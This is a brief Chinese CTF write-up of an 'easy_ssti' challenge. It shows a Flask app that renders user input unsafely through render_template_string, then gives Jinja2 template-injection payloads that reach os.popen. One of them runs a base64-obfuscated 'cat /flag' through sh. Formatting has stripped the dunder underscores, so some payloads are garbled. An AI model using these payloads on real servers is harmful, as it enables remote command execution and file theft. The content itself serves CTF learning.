easy_ssti 100(愚人杯)
通过查看源码,可以看出提示app.zip
下载源码,打开发现是一个python的flaskweb框架
from flask import Flask
from flask import render_template_string,render_template
app = Flask(__name__)
@app.route('/hello/')
def hello(name=None):
return render_template('hello.html',name=name)
@app.route('/hello/<name>')
def hellodear(name):
if "ge" in name:
return render_template_string('hello %s' % name)
elif "f" not in name:
return render_template_string('hello %s' % name)
else:
return 'Nonononon'
没有过滤
测试:
payload:
{
{().class.mro[-1].subclasses()[132].init.globals’popen’.read()}}
{
{().class.mro[-1].subclasses()[132].init.globals[‘popen’](‘echo “Y2F0IC9mbGFn”|base64 -d|sh’).read()}}